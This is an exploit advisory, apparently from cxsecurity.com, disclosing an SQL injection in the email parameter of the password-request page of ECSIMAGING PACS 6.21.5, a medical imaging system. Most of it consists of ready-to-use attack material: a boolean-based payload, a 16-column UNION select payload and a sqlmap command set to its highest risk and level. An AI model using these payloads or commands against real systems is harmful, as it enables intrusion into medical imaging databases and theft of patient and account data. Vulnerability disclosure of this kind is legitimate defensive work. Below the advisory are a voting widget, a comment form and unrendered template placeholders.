ECSIMAGING PACS 6.21.5 SQL Injection

2021.01.08
Credit: shoxxdj
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: ECSIMAGING PACS 6.21.5 - SQL injection # Date: 06/01/2021 # Exploit Author: shoxxdj # Vendor Homepage: https://www.medicalexpo.fr/ # Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 ) # Tested on: Linux ECSIMAGING PACS Application in 6.21.5 and bellow suffers from SQLinjection vulnerability The parameter email is sensitive to SQL Injection (selected_db can be leaked in the parameters ) Payload example : /req_password_user.php?email=test@test.com' OR NOT 9856=9856-- nBwf&selected_db=xtp001 /req_password_user.php?email=test@test.com'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+&selected_db=xtp001 SQLMAP : sqlmap.py -u '<URL>/req_password_user.php?email=test@test.com&selected_db=xtp001' --risk=3 --level=5


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top